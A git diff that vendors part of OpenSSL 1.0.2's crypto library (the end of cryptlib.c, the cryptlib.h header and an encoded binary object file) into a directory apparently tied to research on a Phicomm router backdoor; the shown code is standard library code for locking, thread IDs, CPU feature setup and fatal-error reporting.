+    CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+
+    if (pointer) {
+        dynlock_destroy_callback(pointer->data, __FILE__, __LINE__);
+        OPENSSL_free(pointer);
+    }
+}
+
+struct CRYPTO_dynlock_value *CRYPTO_get_dynlock_value(int i)
+{
+    CRYPTO_dynlock *pointer = NULL;
+    if (i)
+        i = -i - 1;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_DYNLOCK);
+
+    if (dyn_locks != NULL && i < sk_CRYPTO_dynlock_num(dyn_locks))
+        pointer = sk_CRYPTO_dynlock_value(dyn_locks, i);
+    if (pointer)
+        pointer->references++;
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+
+    if (pointer)
+        return pointer->data;
+    return NULL;
+}
+
+struct CRYPTO_dynlock_value *(*CRYPTO_get_dynlock_create_callback(void))
+ (const char *file, int line) {
+    return (dynlock_create_callback);
+}
+
+void (*CRYPTO_get_dynlock_lock_callback(void)) (int mode,
+                                                struct CRYPTO_dynlock_value
+                                                *l, const char *file,
+                                                int line) {
+    return (dynlock_lock_callback);
+}
+
+void (*CRYPTO_get_dynlock_destroy_callback(void))
+ (struct CRYPTO_dynlock_value *l, const char *file, int line) {
+    return (dynlock_destroy_callback);
+}
+
+void CRYPTO_set_dynlock_create_callback(struct CRYPTO_dynlock_value *(*func)
+                                         (const char *file, int line))
+{
+    dynlock_create_callback = func;
+}
+
+void CRYPTO_set_dynlock_lock_callback(void (*func) (int mode,
+                                                    struct
+                                                    CRYPTO_dynlock_value *l,
+                                                    const char *file,
+                                                    int line))
+{
+    dynlock_lock_callback = func;
+}
+
+void CRYPTO_set_dynlock_destroy_callback(void (*func)
+                                          (struct CRYPTO_dynlock_value *l,
+                                           const char *file, int line))
+{
+    dynlock_destroy_callback = func;
+}
+
+void (*CRYPTO_get_locking_callback(void)) (int mode, int type,
+                                           const char *file, int line) {
+    return (locking_callback);
+}
+
+int (*CRYPTO_get_add_lock_callback(void)) (int *num, int mount, int type,
+                                           const char *file, int line) {
+    return (add_lock_callback);
+}
+
+void CRYPTO_set_locking_callback(void (*func) (int mode, int type,
+                                               const char *file, int line))
+{
+    /*
+     * Calling this here ensures initialisation before any threads are
+     * started.
+     */
+    OPENSSL_init();
+    locking_callback = func;
+}
+
+void CRYPTO_set_add_lock_callback(int (*func) (int *num, int mount, int type,
+                                               const char *file, int line))
+{
+    add_lock_callback = func;
+}
+
+/*
+ * the memset() here and in set_pointer() seem overkill, but for the sake of
+ * CRYPTO_THREADID_cmp() this avoids any platform silliness that might cause
+ * two "equal" THREADID structs to not be memcmp()-identical.
+ */
+void CRYPTO_THREADID_set_numeric(CRYPTO_THREADID *id, unsigned long val)
+{
+    memset(id, 0, sizeof(*id));
+    id->val = val;
+}
+
+static const unsigned char hash_coeffs[] = { 3, 5, 7, 11, 13, 17, 19, 23 };
+
+void CRYPTO_THREADID_set_pointer(CRYPTO_THREADID *id, void *ptr)
+{
+    unsigned char *dest = (void *)&id->val;
+    unsigned int accum = 0;
+    unsigned char dnum = sizeof(id->val);
+
+    memset(id, 0, sizeof(*id));
+    id->ptr = ptr;
+    if (sizeof(id->val) >= sizeof(id->ptr)) {
+        /*
+         * 'ptr' can be embedded in 'val' without loss of uniqueness
+         */
+        id->val = (unsigned long)id->ptr;
+        return;
+    }
+    /*
+     * hash ptr ==> val. Each byte of 'val' gets the mod-256 total of a
+     * linear function over the bytes in 'ptr', the co-efficients of which
+     * are a sequence of low-primes (hash_coeffs is an 8-element cycle) - the
+     * starting prime for the sequence varies for each byte of 'val' (unique
+     * polynomials unless pointers are >64-bit). For added spice, the totals
+     * accumulate rather than restarting from zero, and the index of the
+     * 'val' byte is added each time (position dependence). If I was a
+     * black-belt, I'd scan big-endian pointers in reverse to give low-order
+     * bits more play, but this isn't crypto and I'd prefer nobody mistake it
+     * as such. Plus I'm lazy.
+     */
+    while (dnum--) {
+        const unsigned char *src = (void *)&id->ptr;
+        unsigned char snum = sizeof(id->ptr);
+        while (snum--)
+            accum += *(src++) * hash_coeffs[(snum + dnum) & 7];
+        accum += dnum;
+        *(dest++) = accum & 255;
+    }
+}
+
+int CRYPTO_THREADID_set_callback(void (*func) (CRYPTO_THREADID *))
+{
+    if (threadid_callback)
+        return 0;
+    threadid_callback = func;
+    return 1;
+}
+
+void (*CRYPTO_THREADID_get_callback(void)) (CRYPTO_THREADID *) {
+    return threadid_callback;
+}
+
+void CRYPTO_THREADID_current(CRYPTO_THREADID *id)
+{
+    if (threadid_callback) {
+        threadid_callback(id);
+        return;
+    }
+#ifndef OPENSSL_NO_DEPRECATED
+    /* If the deprecated callback was set, fall back to that */
+    if (id_callback) {
+        CRYPTO_THREADID_set_numeric(id, id_callback());
+        return;
+    }
+#endif
+    /* Else pick a backup */
+#ifdef OPENSSL_SYS_WIN16
+    CRYPTO_THREADID_set_numeric(id, (unsigned long)GetCurrentTask());
+#elif defined(OPENSSL_SYS_WIN32)
+    CRYPTO_THREADID_set_numeric(id, (unsigned long)GetCurrentThreadId());
+#elif defined(OPENSSL_SYS_BEOS)
+    CRYPTO_THREADID_set_numeric(id, (unsigned long)find_thread(NULL));
+#else
+    /* For everything else, default to using the address of 'errno' */
+    CRYPTO_THREADID_set_pointer(id, (void *)&errno);
+#endif
+}
+
+int CRYPTO_THREADID_cmp(const CRYPTO_THREADID *a, const CRYPTO_THREADID *b)
+{
+    return memcmp(a, b, sizeof(*a));
+}
+
+void CRYPTO_THREADID_cpy(CRYPTO_THREADID *dest, const CRYPTO_THREADID *src)
+{
+    memcpy(dest, src, sizeof(*src));
+}
+
+unsigned long CRYPTO_THREADID_hash(const CRYPTO_THREADID *id)
+{
+    return id->val;
+}
+
+#ifndef OPENSSL_NO_DEPRECATED
+unsigned long (*CRYPTO_get_id_callback(void)) (void) {
+    return (id_callback);
+}
+
+void CRYPTO_set_id_callback(unsigned long (*func) (void))
+{
+    id_callback = func;
+}
+
+unsigned long CRYPTO_thread_id(void)
+{
+    unsigned long ret = 0;
+
+    if (id_callback == NULL) {
+# ifdef OPENSSL_SYS_WIN16
+        ret = (unsigned long)GetCurrentTask();
+# elif defined(OPENSSL_SYS_WIN32)
+        ret = (unsigned long)GetCurrentThreadId();
+# elif defined(GETPID_IS_MEANINGLESS)
+        ret = 1L;
+# elif defined(OPENSSL_SYS_BEOS)
+        ret = (unsigned long)find_thread(NULL);
+# else
+        ret = (unsigned long)getpid();
+# endif
+    } else
+        ret = id_callback();
+    return (ret);
+}
+#endif
+
+void CRYPTO_lock(int mode, int type, const char *file, int line)
+{
+#ifdef LOCK_DEBUG
+    {
+        CRYPTO_THREADID id;
+        char *rw_text, *operation_text;
+
+        if (mode & CRYPTO_LOCK)
+            operation_text = "lock  ";
+        else if (mode & CRYPTO_UNLOCK)
+            operation_text = "unlock";
+        else
+            operation_text = "ERROR ";
+
+        if (mode & CRYPTO_READ)
+            rw_text = "r";
+        else if (mode & CRYPTO_WRITE)
+            rw_text = "w";
+        else
+            rw_text = "ERROR";
+
+        CRYPTO_THREADID_current(&id);
+        fprintf(stderr, "lock:%08lx:(%s)%s %-18s %s:%d\n",
+                CRYPTO_THREADID_hash(&id), rw_text, operation_text,
+                CRYPTO_get_lock_name(type), file, line);
+    }
+#endif
+    if (type < 0) {
+        if (dynlock_lock_callback != NULL) {
+            struct CRYPTO_dynlock_value *pointer
+                = CRYPTO_get_dynlock_value(type);
+
+            OPENSSL_assert(pointer != NULL);
+
+            dynlock_lock_callback(mode, pointer, file, line);
+
+            CRYPTO_destroy_dynlockid(type);
+        }
+    } else if (locking_callback != NULL)
+        locking_callback(mode, type, file, line);
+}
+
+int CRYPTO_add_lock(int *pointer, int amount, int type, const char *file,
+                    int line)
+{
+    int ret = 0;
+
+    if (add_lock_callback != NULL) {
+#ifdef LOCK_DEBUG
+        int before = *pointer;
+#endif
+
+        ret = add_lock_callback(pointer, amount, type, file, line);
+#ifdef LOCK_DEBUG
+        {
+            CRYPTO_THREADID id;
+            CRYPTO_THREADID_current(&id);
+            fprintf(stderr, "ladd:%08lx:%2d+%2d->%2d %-18s %s:%d\n",
+                    CRYPTO_THREADID_hash(&id), before, amount, ret,
+                    CRYPTO_get_lock_name(type), file, line);
+        }
+#endif
+    } else {
+        CRYPTO_lock(CRYPTO_LOCK | CRYPTO_WRITE, type, file, line);
+
+        ret = *pointer + amount;
+#ifdef LOCK_DEBUG
+        {
+            CRYPTO_THREADID id;
+            CRYPTO_THREADID_current(&id);
+            fprintf(stderr, "ladd:%08lx:%2d+%2d->%2d %-18s %s:%d\n",
+                    CRYPTO_THREADID_hash(&id),
+                    *pointer, amount, ret,
+                    CRYPTO_get_lock_name(type), file, line);
+        }
+#endif
+        *pointer = ret;
+        CRYPTO_lock(CRYPTO_UNLOCK | CRYPTO_WRITE, type, file, line);
+    }
+    return (ret);
+}
+
+const char *CRYPTO_get_lock_name(int type)
+{
+    if (type < 0)
+        return ("dynamic");
+    else if (type < CRYPTO_NUM_LOCKS)
+        return (lock_names[type]);
+    else if (type - CRYPTO_NUM_LOCKS > sk_OPENSSL_STRING_num(app_locks))
+        return ("ERROR");
+    else
+        return (sk_OPENSSL_STRING_value(app_locks, type - CRYPTO_NUM_LOCKS));
+}
+
+#if     defined(__i386)   || defined(__i386__)   || defined(_M_IX86) || \
+        defined(__INTEL__) || \
+        defined(__x86_64) || defined(__x86_64__) || \
+        defined(_M_AMD64) || defined(_M_X64)
+
+extern unsigned int OPENSSL_ia32cap_P[4];
+unsigned long *OPENSSL_ia32cap_loc(void)
+{
+    if (sizeof(long) == 4)
+        /*
+         * If 32-bit application pulls address of OPENSSL_ia32cap_P[0]
+         * clear second element to maintain the illusion that vector
+         * is 32-bit.
+         */
+        OPENSSL_ia32cap_P[1] = 0;
+
+    OPENSSL_ia32cap_P[2] = 0;
+
+    return (unsigned long *)OPENSSL_ia32cap_P;
+}
+
+# if defined(OPENSSL_CPUID_OBJ) && !defined(OPENSSL_NO_ASM) && !defined(I386_ONLY)
+#  define OPENSSL_CPUID_SETUP
+#  if defined(_WIN32)
+typedef unsigned __int64 IA32CAP;
+#  else
+typedef unsigned long long IA32CAP;
+#  endif
+void OPENSSL_cpuid_setup(void)
+{
+    static int trigger = 0;
+    IA32CAP OPENSSL_ia32_cpuid(unsigned int *);
+    IA32CAP vec;
+    char *env;
+
+    if (trigger)
+        return;
+
+    trigger = 1;
+    if ((env = getenv("OPENSSL_ia32cap"))) {
+        int off = (env[0] == '~') ? 1 : 0;
+#  if defined(_WIN32)
+        if (!sscanf(env + off, "%I64i", &vec))
+            vec = strtoul(env + off, NULL, 0);
+#  else
+        if (!sscanf(env + off, "%lli", (long long *)&vec))
+            vec = strtoul(env + off, NULL, 0);
+#  endif
+        if (off)
+            vec = OPENSSL_ia32_cpuid(OPENSSL_ia32cap_P) & ~vec;
+        else if (env[0] == ':')
+            vec = OPENSSL_ia32_cpuid(OPENSSL_ia32cap_P);
+
+        OPENSSL_ia32cap_P[2] = 0;
+        if ((env = strchr(env, ':'))) {
+            unsigned int vecx;
+            env++;
+            off = (env[0] == '~') ? 1 : 0;
+            vecx = strtoul(env + off, NULL, 0);
+            if (off)
+                OPENSSL_ia32cap_P[2] &= ~vecx;
+            else
+                OPENSSL_ia32cap_P[2] = vecx;
+        }
+    } else
+        vec = OPENSSL_ia32_cpuid(OPENSSL_ia32cap_P);
+
+    /*
+     * |(1<<10) sets a reserved bit to signal that variable
+     * was initialized already... This is to avoid interference
+     * with cpuid snippets in ELF .init segment.
+     */
+    OPENSSL_ia32cap_P[0] = (unsigned int)vec | (1 << 10);
+    OPENSSL_ia32cap_P[1] = (unsigned int)(vec >> 32);
+}
+# else
+unsigned int OPENSSL_ia32cap_P[4];
+# endif
+
+#else
+unsigned long *OPENSSL_ia32cap_loc(void)
+{
+    return NULL;
+}
+#endif
+int OPENSSL_NONPIC_relocated = 0;
+#if !defined(OPENSSL_CPUID_SETUP) && !defined(OPENSSL_CPUID_OBJ)
+void OPENSSL_cpuid_setup(void)
+{
+}
+#endif
+
+#if (defined(_WIN32) || defined(__CYGWIN__)) && defined(_WINDLL)
+# ifdef __CYGWIN__
+/* pick DLL_[PROCESS|THREAD]_[ATTACH|DETACH] definitions */
+#  include <windows.h>
+/*
+ * this has side-effect of _WIN32 getting defined, which otherwise is
+ * mutually exclusive with __CYGWIN__...
+ */
+# endif
+
+/*
+ * All we really need to do is remove the 'error' state when a thread
+ * detaches
+ */
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
+{
+    switch (fdwReason) {
+    case DLL_PROCESS_ATTACH:
+        OPENSSL_cpuid_setup();
+# if defined(_WIN32_WINNT)
+        {
+            IMAGE_DOS_HEADER *dos_header = (IMAGE_DOS_HEADER *) hinstDLL;
+            IMAGE_NT_HEADERS *nt_headers;
+
+            if (dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
+                nt_headers = (IMAGE_NT_HEADERS *) ((char *)dos_header
+                                                   + dos_header->e_lfanew);
+                if (nt_headers->Signature == IMAGE_NT_SIGNATURE &&
+                    hinstDLL !=
+                    (HINSTANCE) (nt_headers->OptionalHeader.ImageBase))
+                    OPENSSL_NONPIC_relocated = 1;
+            }
+        }
+# endif
+        break;
+    case DLL_THREAD_ATTACH:
+        break;
+    case DLL_THREAD_DETACH:
+        break;
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return (TRUE);
+}
+#endif
+
+#if defined(_WIN32) && !defined(__CYGWIN__)
+# include <tchar.h>
+# include <signal.h>
+# ifdef __WATCOMC__
+#  if defined(_UNICODE) || defined(__UNICODE__)
+#   define _vsntprintf _vsnwprintf
+#  else
+#   define _vsntprintf _vsnprintf
+#  endif
+# endif
+# ifdef _MSC_VER
+#  define alloca _alloca
+# endif
+
+# if defined(_WIN32_WINNT) && _WIN32_WINNT>=0x0333
+int OPENSSL_isservice(void)
+{
+    HWINSTA h;
+    DWORD len;
+    WCHAR *name;
+    static union {
+        void *p;
+        int (*f) (void);
+    } _OPENSSL_isservice = {
+        NULL
+    };
+
+    if (_OPENSSL_isservice.p == NULL) {
+        HANDLE h = GetModuleHandle(NULL);
+        if (h != NULL)
+            _OPENSSL_isservice.p = GetProcAddress(h, "_OPENSSL_isservice");
+        if (_OPENSSL_isservice.p == NULL)
+            _OPENSSL_isservice.p = (void *)-1;
+    }
+
+    if (_OPENSSL_isservice.p != (void *)-1)
+        return (*_OPENSSL_isservice.f) ();
+
+    (void)GetDesktopWindow();   /* return value is ignored */
+
+    h = GetProcessWindowStation();
+    if (h == NULL)
+        return -1;
+
+    if (GetUserObjectInformationW(h, UOI_NAME, NULL, 0, &len) ||
+        GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+        return -1;
+
+    if (len > 512)
+        return -1;              /* paranoia */
+    len++, len &= ~1;           /* paranoia */
+    name = (WCHAR *)alloca(len + sizeof(WCHAR));
+    if (!GetUserObjectInformationW(h, UOI_NAME, name, len, &len))
+        return -1;
+
+    len++, len &= ~1;           /* paranoia */
+    name[len / sizeof(WCHAR)] = L'\0'; /* paranoia */
+#  if 1
+    /*
+     * This doesn't cover "interactive" services [working with real
+     * WinSta0's] nor programs started non-interactively by Task Scheduler
+     * [those are working with SAWinSta].
+     */
+    if (wcsstr(name, L"Service-0x"))
+        return 1;
+#  else
+    /* This covers all non-interactive programs such as services. */
+    if (!wcsstr(name, L"WinSta0"))
+        return 1;
+#  endif
+    else
+        return 0;
+}
+# else
+int OPENSSL_isservice(void)
+{
+    return 0;
+}
+# endif
+
+void OPENSSL_showfatal(const char *fmta, ...)
+{
+    va_list ap;
+    TCHAR buf[256];
+    const TCHAR *fmt;
+# ifdef STD_ERROR_HANDLE        /* what a dirty trick! */
+    HANDLE h;
+
+    if ((h = GetStdHandle(STD_ERROR_HANDLE)) != NULL &&
+        GetFileType(h) != FILE_TYPE_UNKNOWN) {
+        /* must be console application */
+        int len;
+        DWORD out;
+
+        va_start(ap, fmta);
+        len = _vsnprintf((char *)buf, sizeof(buf), fmta, ap);
+        WriteFile(h, buf, len < 0 ? sizeof(buf) : (DWORD) len, &out, NULL);
+        va_end(ap);
+        return;
+    }
+# endif
+
+    if (sizeof(TCHAR) == sizeof(char))
+        fmt = (const TCHAR *)fmta;
+    else
+        do {
+            int keepgoing;
+            size_t len_0 = strlen(fmta) + 1, i;
+            WCHAR *fmtw;
+
+            fmtw = (WCHAR *)alloca(len_0 * sizeof(WCHAR));
+            if (fmtw == NULL) {
+                fmt = (const TCHAR *)L"no stack?";
+                break;
+            }
+# ifndef OPENSSL_NO_MULTIBYTE
+            if (!MultiByteToWideChar(CP_ACP, 0, fmta, len_0, fmtw, len_0))
+# endif
+                for (i = 0; i < len_0; i++)
+                    fmtw[i] = (WCHAR)fmta[i];
+
+            for (i = 0; i < len_0; i++) {
+                if (fmtw[i] == L'%')
+                    do {
+                        keepgoing = 0;
+                        switch (fmtw[i + 1]) {
+                        case L'0':
+                        case L'1':
+                        case L'2':
+                        case L'3':
+                        case L'4':
+                        case L'5':
+                        case L'6':
+                        case L'7':
+                        case L'8':
+                        case L'9':
+                        case L'.':
+                        case L'*':
+                        case L'-':
+                            i++;
+                            keepgoing = 1;
+                            break;
+                        case L's':
+                            fmtw[i + 1] = L'S';
+                            break;
+                        case L'S':
+                            fmtw[i + 1] = L's';
+                            break;
+                        case L'c':
+                            fmtw[i + 1] = L'C';
+                            break;
+                        case L'C':
+                            fmtw[i + 1] = L'c';
+                            break;
+                        }
+                    } while (keepgoing);
+            }
+            fmt = (const TCHAR *)fmtw;
+        } while (0);
+
+    va_start(ap, fmta);
+    _vsntprintf(buf, sizeof(buf) / sizeof(TCHAR) - 1, fmt, ap);
+    buf[sizeof(buf) / sizeof(TCHAR) - 1] = _T('\0');
+    va_end(ap);
+
+# if defined(_WIN32_WINNT) && _WIN32_WINNT>=0x0333
+    /* this -------------v--- guards NT-specific calls */
+    if (check_winnt() && OPENSSL_isservice() > 0) {
+        HANDLE h = RegisterEventSource(0, _T("OPENSSL"));
+        const TCHAR *pmsg = buf;
+        ReportEvent(h, EVENTLOG_ERROR_TYPE, 0, 0, 0, 1, 0, &pmsg, 0);
+        DeregisterEventSource(h);
+    } else
+# endif
+        MessageBox(NULL, buf, _T("OpenSSL: FATAL"), MB_OK | MB_ICONSTOP);
+}
+#else
+void OPENSSL_showfatal(const char *fmta, ...)
+{
+    va_list ap;
+
+    va_start(ap, fmta);
+    vfprintf(stderr, fmta, ap);
+    va_end(ap);
+}
+
+int OPENSSL_isservice(void)
+{
+    return 0;
+}
+#endif
+
+void OpenSSLDie(const char *file, int line, const char *assertion)
+{
+    OPENSSL_showfatal
+        ("%s(%d): OpenSSL internal error, assertion failed: %s\n", file, line,
+         assertion);
+#if !defined(_WIN32) || defined(__CYGWIN__)
+    abort();
+#else
+    /*
+     * Win32 abort() customarily shows a dialog, but we just did that...
+     */
+# if !defined(_WIN32_WCE)
+    raise(SIGABRT);
+# endif
+    _exit(3);
+#endif
+}
+
+void *OPENSSL_stderr(void)
+{
+    return stderr;
+}
+
+int CRYPTO_memcmp(const void *in_a, const void *in_b, size_t len)
+{
+    size_t i;
+    const unsigned char *a = in_a;
+    const unsigned char *b = in_b;
+    unsigned char x = 0;
+
+    for (i = 0; i < len; i++)
+        x |= a[i] ^ b[i];
+
+    return x;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.h
new file mode 100644
index 0000000..fba180a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.h
@@ -0,0 +1,111 @@
+/* crypto/cryptlib.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_CRYPTLIB_H
+# define HEADER_CRYPTLIB_H
+
+# include <stdlib.h>
+# include <string.h>
+
+# include "e_os.h"
+
+# ifdef OPENSSL_USE_APPLINK
+#  define BIO_FLAGS_UPLINK 0x8000
+#  include "ms/uplink.h"
+# endif
+
+# include <openssl/crypto.h>
+# include <openssl/buffer.h>
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/opensslconf.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifndef OPENSSL_SYS_VMS
+#  define X509_CERT_AREA          OPENSSLDIR
+#  define X509_CERT_DIR           OPENSSLDIR "/certs"
+#  define X509_CERT_FILE          OPENSSLDIR "/cert.pem"
+#  define X509_PRIVATE_DIR        OPENSSLDIR "/private"
+# else
+#  define X509_CERT_AREA          "SSLROOT:[000000]"
+#  define X509_CERT_DIR           "SSLCERTS:"
+#  define X509_CERT_FILE          "SSLCERTS:cert.pem"
+#  define X509_PRIVATE_DIR        "SSLPRIVATE:"
+# endif
+
+# define X509_CERT_DIR_EVP        "SSL_CERT_DIR"
+# define X509_CERT_FILE_EVP       "SSL_CERT_FILE"
+
+/* size of string representations */
+# define DECIMAL_SIZE(type)      ((sizeof(type)*8+2)/3+1)
+# define HEX_SIZE(type)          (sizeof(type)*2)
+
+void OPENSSL_cpuid_setup(void);
+extern unsigned int OPENSSL_ia32cap_P[];
+void OPENSSL_showfatal(const char *fmta, ...);
+void *OPENSSL_stderr(void);
+extern int OPENSSL_NONPIC_relocated;
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.o
new file mode 100644
index 0000000000000000000000000000000000000000..3b3b0e108a47193a32d30a0fd7c1d50eadc84c5c
GIT binary patch
literal 12616
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
